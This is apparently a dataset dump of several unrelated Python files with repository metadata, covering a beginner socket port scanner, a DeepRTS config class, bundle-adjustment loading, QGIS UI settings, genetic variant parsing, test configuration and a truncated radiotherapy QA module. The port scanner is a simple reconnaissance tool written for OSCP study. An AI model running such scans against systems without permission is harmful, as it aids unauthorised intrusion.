a5beb41af4430b2099835db80d6290e3504d0626
|
[
"MIT"
] | null | null | null |
code/python/portscanner.py
|
Grasshoppeh/road2oscp
|
a5beb41af4430b2099835db80d6290e3504d0626
|
[
"MIT"
] | null | null | null |
code/python/portscanner.py
|
Grasshoppeh/road2oscp
|
a5beb41af4430b2099835db80d6290e3504d0626
|
[
"MIT"
] | null | null | null |
#!/bin/python3
__author__ = 'Richard Ellis'
__credits__ = 'Heath Adams'
__version__ = '1.0'
#My first take on a quick port scanning script in Python. The goal was to practice using the socket library. I already had previous knowledge of Python.
#Areas that could be improved:
# - an argument to scan a search space of IP addresses
# - multiprocessing on the socket connect
# - using the time library so everything does not run at once
# - for the inet_aton check, catching the failure exception and exiting? Not sure; maybe in that case it is better to let it traceback.
import sys
import socket
import argparse
from datetime import datetime
#Get arguments from the command line
parser = argparse.ArgumentParser()
parser.add_argument("ip", default='127.0.0.1', help='IP you want to scan')
parser.add_argument('-s', '--start', type=int, default=1, help='Port to start scanning from. Default 1')
parser.add_argument('-e', '--end', type=int, default=65535, help='Port to end scanning at. Default 65535')
args = parser.parse_args()
if args.start > args.end or args.start < 1 or args.end < 1 or args.start > 65535 or args.end > 65535:
sys.exit('Start/end arguments invalid logic')
#Scan in a given port range and ip
if socket.inet_aton(args.ip):
target = socket.gethostbyname(sys.argv[1])
try:
print("Starting scan")
for port in range(args.start,args.end):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
result = sock.connect_ex((target,port))
if result == 0:
print("OPEN: port {openport} is open".format(openport=port))
sock.close()
print("Scan finished")
except KeyboardInterrupt:
sys.exit("\nExiting program")
except socket.gaierror:
sys.exit('\n Hostname could not be resolved.')
except socket.error:
sys.exit('\nCouldnt connect to server.')
| 37.5 | 157 | 0.719467 |
bd7279f7dcdddd83bc8a0d9881d161c50adc033f
| 147 |
py
|
Python
|
triNum.py
|
mrmayurs4/Hacktoberfest-2020
|
f2bc129bd8574d5870b9595a019bff3baddeaf73
|
[
"MIT"
] | null | null | null |
triNum.py
|
mrmayurs4/Hacktoberfest-2020
|
f2bc129bd8574d5870b9595a019bff3baddeaf73
|
[
"MIT"
] | null | null | null |
triNum.py
|
mrmayurs4/Hacktoberfest-2020
|
f2bc129bd8574d5870b9595a019bff3baddeaf73
|
[
"MIT"
] | null | null | null |
n = int(input("Enter n for the nth triangular number: "))
triNum = ((n**2)+n)/2
print("The {}th triangular number is {}".format(str(n), str(triNum)))
| 49 | 70 | 0.646259 |
e509aa82982c8c6591ee46e853299876de698333
| 362 |
py
|
Python
|
DeepRTS/python/_py_game_arguments.py
|
Yigit-Arisoy/deep-rts
|
a5ed2c29b76789830df9f7075480c7229ccf0f4d
|
[
"MIT"
] | 1 |
2020-01-08T22:20:37.000Z
|
2020-01-08T22:20:37.000Z
|
DeepRTS/python/_py_game_arguments.py
|
Yigit-Arisoy/deep-rts
|
a5ed2c29b76789830df9f7075480c7229ccf0f4d
|
[
"MIT"
] | 1 |
2021-11-11T18:39:56.000Z
|
2021-11-11T22:15:59.000Z
|
DeepRTS/python/_py_game_arguments.py
|
Yigit-Arisoy/deep-rts
|
a5ed2c29b76789830df9f7075480c7229ccf0f4d
|
[
"MIT"
] | null | null | null |
from DeepRTS import python
from DeepRTS import Engine
class GameArguments:
def __init__(
self,
game_map,
n_players,
engine_config,
gui_config
):
self.game_map = game_map
self.n_player = n_players
self.engine_config = engine_config
self.gui_config = gui_config
| 21.294118 | 42 | 0.59116 |
e559c2d3f0ef2f9a97c31a62af4c951e19f364d6
| 2,386 |
py
|
Python
|
research/3d/DeepLM/ba_core/io.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/3d/DeepLM/ba_core/io.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/3d/DeepLM/ba_core/io.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===========================================================================
"""DeepLM io."""
import numpy as np
def load_bal_from_file(filename, feature_dim, camera_dim, point_dim, double=True):
"""load ba data"""
dtype = np.float64 if double else np.float32
with open(filename, 'r') as f:
num_cameras, num_points, num_observations = [int(i) for i in f.readline().strip().split()]
point_indices = []
cam_indices = []
t_camera = np.zeros((num_cameras, camera_dim)).astype(dtype)
t_point = np.zeros((num_points, point_dim)).astype(dtype)
t_feat = np.zeros((num_observations, feature_dim)).astype(dtype)
for i in range(num_observations):
features2d = []
if i % 1000 == 0:
print("\r Load observation {} of {}".format(i, num_observations), end="", flush=True)
cam_idx, point_idx, x, y = f.readline().strip().split()
point_indices.append(int(point_idx))
cam_indices.append(int(cam_idx))
features2d.append(float(x))
features2d.append(float(y))
t_feat[i] = (features2d)
t_point_indices = point_indices
t_cam_indices = cam_indices
for i in range(num_cameras):
camera_paras = []
for _ in range(camera_dim):
camera_para = f.readline().strip().split()[0]
camera_paras.append(float(camera_para))
t_camera[i] = camera_paras
for i in range(num_points):
points3d = []
for _ in range(point_dim):
point = f.readline().strip().split()[0]
points3d.append(float(point))
t_point[i] = points3d
return t_point, t_camera, t_feat, t_point_indices, t_cam_indices
| 39.766667 | 101 | 0.612741 |
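A tiny round-trip sketch for load_bal_from_file above: it writes a BAL-style text file (header line, observation lines, then one camera parameter per line, then one point coordinate per line) and reads it back. The dimensions used here (feature_dim=2, camera_dim=9, point_dim=3) follow the standard BAL layout but are an assumption about how the function is called.
import tempfile
lines = ["1 1 1",                 # num_cameras num_points num_observations
         "0 0 10.5 -3.25"]        # cam_idx point_idx x y
lines += ["0.1"] * 9              # one camera, nine parameters, one value per line
lines += ["1.0", "2.0", "3.0"]    # one 3-D point, one coordinate per line
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
    f.write("\n".join(lines) + "\n")
    path = f.name
pts, cams, feats, pt_idx, cam_idx = load_bal_from_file(path, 2, 9, 3)
print(pts.shape, cams.shape, feats.shape, pt_idx, cam_idx)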
009951fbfdb6f0ee94d6da4c7549b09484f8dd68
| 2,298 |
py
|
Python
|
GZP_GTO_QGIS/INSTALLATION/GeoTaskOrganizer/mActionGTOuis.py
|
msgis/swwat-gzp-template
|
080afbe9d49fb34ed60ba45654383d9cfca01e24
|
[
"MIT"
] | 3 |
2019-06-18T15:28:09.000Z
|
2019-07-11T07:31:45.000Z
|
GZP_GTO_QGIS/INSTALLATION/GeoTaskOrganizer/mActionGTOuis.py
|
msgis/swwat-gzp-template
|
080afbe9d49fb34ed60ba45654383d9cfca01e24
|
[
"MIT"
] | 2 |
2019-07-11T14:03:25.000Z
|
2021-02-08T16:14:04.000Z
|
GZP_GTO_QGIS/INSTALLATION/GeoTaskOrganizer/mActionGTOuis.py
|
msgis/swwat-gzp-template
|
080afbe9d49fb34ed60ba45654383d9cfca01e24
|
[
"MIT"
] | 1 |
2019-06-12T11:07:37.000Z
|
2019-06-12T11:07:37.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from PyQt5.QtGui import *
from PyQt5.QtWidgets import QToolBar,QDockWidget
def run(id, gtotool, config, debug):
try:
#read config
toolbars_hideall = config.get('toolbars_hideall',False)
toolbars = config.get('toolbars',[])
menus_hideall = config.get('menus_hideall',False)
menus= config.get('menus',[])
panels_hideall = config.get('panels_hideall',False)
panels = config.get('panels',[])
showstatusbar=True
try:
showstatusbar = config.get('showstatusbar',True)
except:
pass
#references
info = gtotool.info
iface = gtotool.iface
#toolbars
qtoolbars = iface.mainWindow().findChildren(QToolBar)
for toolbar in qtoolbars:
objName = toolbar.objectName()
if debug: info.log("toolbar:", objName,"title:",toolbar.windowTitle())
if objName in toolbars:
toolbar.setHidden(False)
else:
if toolbars_hideall and objName !='mGTOtoolbar': toolbar.setHidden(True)
if objName == 'gtoTB_debug': toolbar.setHidden(False)
#panels
qpanels = iface.mainWindow().findChildren(QDockWidget)
for panel in qpanels:
objName = panel.objectName()
if debug: info.log("panel:",objName)
if objName in panels:
panel.setHidden(False)
else:
if panels_hideall and objName != 'GTODockWidget': panel.setHidden(True)
#restor toolbars in panels
toolbars = panel.findChildren(QToolBar)
for t in toolbars:
t.setHidden(False)
if debug: info.log("toolbar restored:", t.objectName())
#menus
qmenubar = iface.mainWindow().menuBar()
for action in qmenubar.actions():
objName= action.menu().objectName()
if debug: info.log("menu:",objName)
if objName in menus:
action.setVisible(True)
else:
if menus_hideall: action.setVisible(False)
#statusbar
iface.mainWindow().statusBar().setHidden(not showstatusbar)
except Exception as e:
gtotool.info.err(e)
| 35.90625 | 88 | 0.58181 |
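A hypothetical configuration dict for the run() hook above, listing the keys it reads; the QGIS object names are examples only and depend on the installed toolbars, menus and panels.
config = {
    "toolbars_hideall": True,
    "toolbars": ["mFileToolBar", "mMapNavToolBar"],   # keep only these visible
    "menus_hideall": False,
    "menus": [],
    "panels_hideall": True,
    "panels": ["Layers"],
    "showstatusbar": True,
}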
dae43e027cc58c09a9ba624be8d3475605035bce
| 4,368 |
py
|
Python
|
parser.py
|
kevinxin90/emv
|
97c6edd1f7055bd19ffed857d5f2c925ab518019
|
[
"Apache-2.0"
] | null | null | null |
parser.py
|
kevinxin90/emv
|
97c6edd1f7055bd19ffed857d5f2c925ab518019
|
[
"Apache-2.0"
] | null | null | null |
parser.py
|
kevinxin90/emv
|
97c6edd1f7055bd19ffed857d5f2c925ab518019
|
[
"Apache-2.0"
] | null | null | null |
import os
import re
import requests
from collections import defaultdict
from biothings.utils.dataload import dict_sweep, value_convert_to_number, unlist, open_anyfile
class DictQuery(dict):
"""Parse nested dictionary
"""
def get(self, path, default=None):
"""Extract value from dictionary based on path
"""
keys = path.split("/")
val = None
for key in keys:
if val:
if isinstance(val, list):
val = [v.get(key, default) if v else None for v in val]
else:
val = val.get(key, default)
else:
val = dict.get(self, key, default)
if not val:
break
return val
def batch_query_myvariant_id_from_clingen(hgvs_ids, assembly):
"""Query ClinGen to get myvariant IDs for all input non genomic hgvs IDs
Keyword arguments:
hgvs_ids -- list of non genomic hgvs IDs
assembly -- genomic assembly, either hg19 or hg38
"""
def parse_myvariant_ids(doc, assembly):
"""Parse the results from clingen to retrieve myvariant id
Keyword arguments:
doc -- doc retrieved from clingen
"""
ASSEMBLY_MAPPING = {
"hg19": "MyVariantInfo_hg19",
"hg38": "MyVariantInfo_hg38"
}
extract_path = 'externalRecords/' + ASSEMBLY_MAPPING[assembly]
res = DictQuery(doc).get(extract_path)
if res:
return [_doc['id'] for _doc in res if _doc]
else:
return []
hgvs_dict = {}
hgvs_ids = list(set(hgvs_ids))
print('total hgvs ids to process is: {}'.format(len(hgvs_ids)))
for i in range(0, len(hgvs_ids), 1000):
print('currently processing {}th variant'.format(i))
if i + 1000 <= len(hgvs_ids):
batch = hgvs_ids[i: i + 1000]
else:
batch = hgvs_ids[i:]
data = '\n'.join(batch)
res = requests.post('http://reg.genome.network/alleles?file=hgvs',
data=data,
headers={'content-type': "text/plain" }).json()
# loop through clingen results and input hgvs id in parallel
# construct a mapping dictionary with key as input hgvs id
# and value as myvariant hgvs id
for _doc, _id in zip(res, batch):
hgvs_dict[_id] = parse_myvariant_ids(_doc, assembly)
return hgvs_dict
def _map_line_to_json(fields):
"""Mapping each lines in csv file into JSON doc
"""
one_snp_json = {
"gene": fields[1],
"variant_id": fields[2],
"exon": fields[3],
"egl_variant": fields[4],
"egl_protein": fields[5],
"egl_classification": fields[6],
"egl_classification_date": fields[7],
"hgvs": fields[8].split(" | ")
}
return unlist(dict_sweep(value_convert_to_number(one_snp_json), vals=[""]))
def load_data(data_folder, assembly="hg19"):
"""Load data from EMV csv file into list of JSON docs
"""
input_file = os.path.join(data_folder, "EmVClass.2018-Q2.csv")
assert os.path.exists(input_file), "Can't find input file '%s'" % input_file
with open_anyfile(input_file) as in_f:
lines = set(list(in_f))
lines = [_doc.strip().split(',') for _doc in lines]
print(list(lines)[0])
results = defaultdict(list)
# mapping non genomic hgvs ids to genomic hgvs ids used in MyVariant
hgvs_ids = [_item[4] for _item in lines]
#print(hgvs_ids)
hgvs_mapping_dict = batch_query_myvariant_id_from_clingen(hgvs_ids, assembly)
# loop through csv doc to convert into json docs
for row in lines:
# structure the content of emv docs
variant = _map_line_to_json(row)
# fetch corresponding genomic hgvs ids
mapped_ids = hgvs_mapping_dict[row[4]]
# could be one non-genomic hgvs id mapping to mulitple genomic ones
if mapped_ids:
for _id in mapped_ids:
results[_id].append(variant)
for k, v in results.items():
if len(v) == 1:
doc = {'_id': k, 'emv': v[0]}
else:
doc = {'_id': k, 'emv': [_doc for _doc in v]}
print('case of multi hits', doc)
yield doc
| 35.225806 | 94 | 0.581731 |
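A short illustration of the DictQuery helper above: path segments separated by "/" walk nested dictionaries, and when a value along the path is a list the lookup is applied element-wise.
doc = {
    "externalRecords": {
        "MyVariantInfo_hg19": [{"id": "chr1:g.100A>T"}, {"id": "chr1:g.101G>C"}]
    }
}
print(DictQuery(doc).get("externalRecords/MyVariantInfo_hg19/id"))
# -> ['chr1:g.100A>T', 'chr1:g.101G>C']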
97773a4d3d3a4700454d47c168040a1528d9ef1b
| 143 |
py
|
Python
|
Online-Judges/CodingBat/Python/String-02/String_2-05-end_other.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | 3 |
2021-06-15T01:19:23.000Z
|
2022-03-16T18:23:53.000Z
|
Online-Judges/CodingBat/Python/String-02/String_2-05-end_other.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
Online-Judges/CodingBat/Python/String-02/String_2-05-end_other.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
def end_other(a, b):
a = a.lower()
b = b.lower()
if a[-(len(b)):] == b or a == b[-(len(a)):]:
return True
return False
| 20.428571 | 48 | 0.454545 |
c182cadfa61e971b84daba5d58d73de313bad748
| 1,083 |
py
|
Python
|
template_prototype/optimise-images.py
|
rustbridge/rbb
|
de097a67d34a1c73fd832832877fa81d2cac7b65
|
[
"Apache-2.0"
] | null | null | null |
template_prototype/optimise-images.py
|
rustbridge/rbb
|
de097a67d34a1c73fd832832877fa81d2cac7b65
|
[
"Apache-2.0"
] | null | null | null |
template_prototype/optimise-images.py
|
rustbridge/rbb
|
de097a67d34a1c73fd832832877fa81d2cac7b65
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import glob, os, subprocess, sys
status, _ = subprocess.getstatusoutput('convert -h')
if status != 1:
print("`convert` not found. ImageMagick is required to to optimise images.")
print("<http://www.imagemagick.org/index.php>")
sys.exit()
for filename in glob.glob('assets/img/*.original.jpg'):
directory = os.path.dirname(filename)
# foo.original.jpg -> foo.jpg
basename = os.path.splitext(os.path.splitext(filename)[0])[0]
new_name = f'{basename}.jpg'
print(f'Processing {filename} -> {new_name}')
# Adapted from https://stackoverflow.com/questions/7261855/recommendation-for-compressing-jpg-files-with-imagemagick
command = [
'convert',
'-strip',
'-interlace', 'Plane',
'-gaussian-blur', '0.05',
'-quality', '85%',
# 'x1080' will scale the image's height to 1080px while maintaining the
# current aspect ratio.
'-resize', 'x1080',
filename,
new_name,
]
subprocess.run(command, check=True)
print("All images optimised ☀️")
| 29.27027 | 120 | 0.635272 |
de0807ded9a250b399a256259a8a5bb97ec944b7
| 342 |
py
|
Python
|
exercises/ja/test_01_02_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/ja/test_01_02_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/ja/test_01_02_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
def test():
import spacy.tokens
import spacy.lang.en
assert isinstance(
nlp, spacy.lang.en.English
), "nlpオブジェクトはEnglishクラスのインスタンスでなければなりません"
assert isinstance(doc, spacy.tokens.Doc), "テキストをnlpオブジェクトで処理してdocを作成しましたか?"
assert "print(doc.text)" in __solution__, "doc.textをプリントしましたか?"
__msg__.good("正解です!")
| 28.5 | 79 | 0.707602 |
e75bcb4f291b3ac4953a67fb89624c78a72246cb
| 1,379 |
py
|
Python
|
deprecated/benchmark/collective/utils/timer.py
|
hutuxian/FleetX
|
843c7aa33f5a14680becf058a3aaf0327eefafd4
|
[
"Apache-2.0"
] | 170 |
2020-08-12T12:07:01.000Z
|
2022-03-07T02:38:26.000Z
|
deprecated/benchmark/collective/utils/timer.py
|
hutuxian/FleetX
|
843c7aa33f5a14680becf058a3aaf0327eefafd4
|
[
"Apache-2.0"
] | 195 |
2020-08-13T03:22:15.000Z
|
2022-03-30T07:40:25.000Z
|
deprecated/benchmark/collective/utils/timer.py
|
hutuxian/FleetX
|
843c7aa33f5a14680becf058a3aaf0327eefafd4
|
[
"Apache-2.0"
] | 67 |
2020-08-14T02:07:46.000Z
|
2022-03-28T10:05:33.000Z
|
#copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import time
class BenchmarkTimer(object):
def __init__(self):
self.start_timer_step = 0
self.end_timer_step = 100001
self.cur_step = 0
self.total_time = 0.0
self.step_start = 0.0
def set_start_step(self, step):
self.start_timer_step = step
def time_begin(self):
self.cur_step += 1
if self.cur_step > self.start_timer_step:
self.step_start = time.time()
def time_end(self):
if self.cur_step > self.start_timer_step:
end = time.time()
self.total_time += end - self.step_start
def time_per_step(self):
if self.cur_step <= self.start_timer_step:
return 0.0
return self.total_time / (self.cur_step - self.start_timer_step)
| 32.833333 | 73 | 0.685279 |
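A minimal usage sketch for BenchmarkTimer above: skip two warm-up steps, time the remaining iterations, and report the average number of seconds per step.
import time
timer = BenchmarkTimer()
timer.set_start_step(2)          # ignore the first two warm-up steps
for _ in range(10):
    timer.time_begin()
    time.sleep(0.01)             # stand-in for one training step
    timer.time_end()
print("avg seconds/step: %.4f" % timer.time_per_step())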
8217bf14566c840cdb0a8ca5a97a8e83e6cd9793
| 10,719 |
py
|
Python
|
hihope_neptune-oh_hid/00_src/v0.1/test/developertest/src/core/config/config_manager.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | 1 |
2022-02-15T08:51:55.000Z
|
2022-02-15T08:51:55.000Z
|
hihope_neptune-oh_hid/00_src/v0.1/test/developertest/src/core/config/config_manager.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | null | null | null |
hihope_neptune-oh_hid/00_src/v0.1/test/developertest/src/core/config/config_manager.py
|
dawmlight/vendor_oh_fun
|
bc9fb50920f06cd4c27399f60076f5793043c77d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# coding=utf-8
#
# Copyright (c) 2020 Huawei Device Co., Ltd.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import os
import xml.etree.ElementTree as ET
from xdevice import platform_logger
from core.constants import ConfigFileConst
LOG = platform_logger("config_manager")
CONFIG_PATH = os.path.join(sys.framework_res_dir, "config")
class FrameworkConfigManager(object):
def __init__(self, filepath=""):
if filepath == "":
self.filepath = os.path.abspath(os.path.join(
CONFIG_PATH, ConfigFileConst.FRAMECONFIG_FILEPATH))
else:
self.filepath = filepath
def get_framework_config(self, target_name):
data_list = []
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
node = root.find(target_name)
for sub in node:
value = sub.attrib.get("name")
if value and value != "":
data_list.append(value)
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return data_list
def get_test_category_info(self, target_name="test_category"):
test_type_timeout_dic = {}
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
node = root.find(target_name)
for sub in node:
name = sub.attrib.get("name")
desc = sub.attrib.get("desc")
timeout = sub.attrib.get("timeout")
if name and desc and timeout:
test_type_timeout_dic[name] = (desc, timeout)
else:
LOG.error("The %s file does not exist." % self.filepath)
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return test_type_timeout_dic
def get_all_category_info(self, target_name="all_category"):
return self.get_framework_config(target_name)
class FilterConfigManager(object):
def __init__(self, filepath=""):
if filepath == "":
self.filepath = os.path.abspath(
os.path.join(CONFIG_PATH,
ConfigFileConst.FILTERCONFIG_FILEPATH))
else:
self.filepath = filepath
def get_filtering_list(self, target_name, product_form):
filter_data_list = []
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
for child in root:
if child.tag != target_name:
continue
for child2 in child:
if child2.tag != product_form.lower():
continue
for child3 in child2:
if child3.text != "" and child3.text is not None:
filter_data_list.append(child3.text)
else:
LOG.error("The %s file does not exist." % self.filepath)
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return filter_data_list
def get_filter_config_path(self):
return self.filepath
class ResourceConfigManager(object):
def __init__(self, filepath=""):
if filepath == "":
self.filepath = os.path.abspath(os.path.join(
CONFIG_PATH, ConfigFileConst.RESOURCECONFIG_FILEPATH))
if not os.path.exists(self.filepath):
self.filepath = os.path.abspath(os.path.join(
CONFIG_PATH, ConfigFileConst.CASE_RESOURCE_FILEPATH))
else:
self.filepath = filepath
def get_resource_config(self):
data_list = []
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
for child in root:
temp_list = [child.attrib]
for sub in child:
temp_list.append(sub.attrib)
data_list.append(temp_list)
else:
LOG.error("The %s is not exist." % self.filepath)
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return data_list
def get_resource_config_path(self):
return self.filepath
class UserConfigManager(object):
def __init__(self, config_file=""):
if config_file == "":
self.filepath = os.path.abspath(os.path.join(
CONFIG_PATH, ConfigFileConst.USERCONFIG_FILEPATH))
else:
if os.path.isabs(config_file):
self.filepath = config_file
else:
self.filepath = os.path.abspath(
os.path.join(CONFIG_PATH, config_file))
def get_user_config_list(self, tag_name):
data_dic = {}
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
for child in root:
if tag_name == child.tag:
for sub in child:
data_dic[sub.tag] = sub.text
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return data_dic
@classmethod
def content_strip(cls, content):
return content.strip()
@classmethod
def _verify_duplicate(cls, items):
if len(set(items)) != len(items):
LOG.warning("find duplicate sn config, configuration incorrect")
return False
return True
def _handle_str(self, content):
config_list = map(self.content_strip, content.split(';'))
config_list = [item for item in config_list if item]
if config_list:
if not self._verify_duplicate(config_list):
return []
return config_list
def get_sn_list(self):
sn_select_list = []
try:
data_dic = {}
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
for node in root.findall("environment/device"):
if node.attrib["type"] != "usb-hdc":
continue
for sub in node:
data_dic[sub.tag] = sub.text if sub.text else ""
sn_config = data_dic.get("sn", "")
if sn_config:
sn_select_list = self._handle_str(sn_config)
break
except ET.ParseError as xml_exception:
LOG.warning("occurs exception:{}".format(xml_exception.args))
sn_select_list = []
return sn_select_list
def get_user_config(self, target_name, sub_target=""):
data_dic = {}
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
node = root.find(target_name)
if not node:
return None
if sub_target != "":
node = node.find(sub_target)
if not node:
return None
for sub in node:
if sub.text is None:
data_dic[sub.tag] = ""
else:
data_dic[sub.tag] = sub.text
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return data_dic
def get_user_config_flag(self, target_name, sub_target):
config_flag = self.get_user_config(target_name).get(sub_target, "")
if config_flag == "":
return False
return True if config_flag.lower() == "true" else False
def get_device(self, target_name):
data_dic = {}
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
config_content = tree.getroot()
for node in config_content.findall(target_name):
for sub in node:
if sub.text is None:
data_dic[sub.tag] = ""
else:
data_dic[sub.tag] = sub.text
break
return data_dic
def get_test_cases_dir(self):
testcase_path = self.get_user_config("test_cases").get("dir", "")
if testcase_path != "":
testcase_path = os.path.abspath(testcase_path)
return testcase_path
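# A minimal sketch of the <environment> block that UserConfigManager.get_sn_list()
# expects: serial numbers are read from the <sn> tag of the first usb-hdc device and
# split on ';' by _handle_str(); duplicate entries invalidate the whole list. The
# file name and the sample values below are illustrative assumptions:
#   <user_config>
#       <environment>
#           <device type="usb-hdc">
#               <sn>SN001;SN002</sn>
#           </device>
#       </environment>
#   </user_config>
def _demo_sn_list(config_file="user_config_sample.xml"):
    """Illustrative helper only: returns ["SN001", "SN002"] for the sample above."""
    return UserConfigManager(config_file=config_file).get_sn_list()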
class BuildConfigManager(object):
def __init__(self, filepath=""):
if filepath == "":
self.filepath = os.path.abspath(os.path.join(
CONFIG_PATH, ConfigFileConst.BUILDCONFIG_FILEPATH))
else:
self.filepath = filepath
def get_build_config(self, target_name):
data_list = []
try:
if os.path.exists(self.filepath):
tree = ET.parse(self.filepath)
root = tree.getroot()
node = root.find(target_name)
for sub in node:
value = sub.attrib.get("name")
if value and value != "":
data_list.append(value)
except ET.ParseError as xml_exception:
LOG.error(("Parse %s fail!" % self.filepath) + xml_exception.args)
return data_list
def get_build_path(self):
return self.filepath
| 37.479021 | 79 | 0.536711 |
d4523603323d200479e760b2e51a2da82022b0b2
| 62,034 |
py
|
Python
|
app/qa/field.py
|
MePyDo/pygqa
|
61cde42ee815968fdd029cc5056ede3badea3d91
|
[
"MIT"
] | 3 |
2021-02-25T13:19:52.000Z
|
2021-03-03T03:46:46.000Z
|
app/qa/field.py
|
MedPhyDO/pygqa
|
580b2c6028d2299790a38262b795b8409cbfcc37
|
[
"MIT"
] | null | null | null |
app/qa/field.py
|
MedPhyDO/pygqa
|
580b2c6028d2299790a38262b795b8409cbfcc37
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
__author__ = "R. Bauer"
__copyright__ = "MedPhyDO - Machbarkeitsstudien des Instituts für Medizinische Strahlenphysik und Strahlenschutz am Klinikum Dortmund im Rahmen von Bachelor und Masterarbeiten an der TU-Dortmund / FH-Dortmund"
__credits__ = ["R.Bauer", "K.Loot"]
__license__ = "MIT"
__version__ = "0.1.2"
__status__ = "Prototype"
from pylinac import FlatSym
from pylinac.core.profile import MultiProfile
from pylinac.core.geometry import Point
from app.base import ispBase
from app.image import DicomImage
from app.check import ispCheckClass
from isp.config import dict_merge
import numpy as np
import pandas as pd
from dotmap import DotMap
import matplotlib.pyplot as plt
# logging
import logging
logger = logging.getLogger( "MQTT" )
import math
def pointRotate(origin, point, angle):
"""
Rotate a point counterclockwise by a given angle around a given origin.
with the usual axis conventions:
x increasing from left to right, y increasing vertically upwards.
    The angle should be given in degrees.
"""
ox = origin.x
oy = origin.y
px = point.x
py = point.y
angle = math.radians( angle )
qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)
qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)
return Point( qx, qy )
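# A small usage sketch for pointRotate(), assuming the axis conventions from the
# docstring: rotating the point (1, 0) by 90 degrees counterclockwise around the
# origin yields approximately (0, 1).
def _demo_point_rotate():
    """Illustrative helper only: returns a Point close to (0, 1)."""
    return pointRotate(Point(0, 0), Point(1, 0), 90)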
class FSImage( FlatSym, DicomImage ):
def __init__(self, pathOrData=None, **kwargs ):
""" Erweitert PFDicomImage um die eigene DicomImage Klasse
"""
# die eigene Erweiterung
DicomImage.__init__( self, pathOrData )
class qa_field( ispCheckClass ):
"""Erweitert die Klasse , um eine eigene DicomImage Erweiterung zu verwenden
"""
def __init__( self, checkField, baseField=None, normalize: str="none" ):
""" checkField und ggf baseField laden und ispCheckClass initialisieren
"""
